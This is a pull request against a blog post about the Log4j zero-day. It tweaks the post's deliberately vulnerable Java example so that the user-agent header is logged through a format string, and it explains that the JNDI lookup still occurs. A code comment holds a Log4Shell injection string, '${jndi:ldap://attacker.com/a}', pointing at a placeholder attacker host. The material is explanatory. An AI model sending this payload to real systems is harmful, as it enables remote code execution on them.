### PR TITLE
Avoid using user input as format string

### DIFF
--- a/docs/blog/2021-12-09-log4j-zero-day.md
+++ b/docs/blog/2021-12-09-log4j-zero-day.md
@@ -105,7 +105,7 @@ public class VulnerableLog4jExampleHandler implements HttpHandler {
     
     // This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.
     // The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
-    log.info("Request User Agent:" + userAgent);
+    log.info("Request User Agent: {}", userAgent);
 
     String response = "<h1>Hello There, " + userAgent + "!</h1>";
     he.sendResponseHeaders(200, response.length());


### PR DESCRIPTION
When I first saw this post, I thought the issue was limited to incorrect usage of the `Logger` API. Hopefully this change will make it clearer to others who might also think this.

The first string argument to a logging method is meant to be a format string, which is normally a constant string rather than something derived from user input.

The JNDI lookup still occurs when the user input is not included in the format string, so this change should make it clear that it's not an issue with misplacement of user input.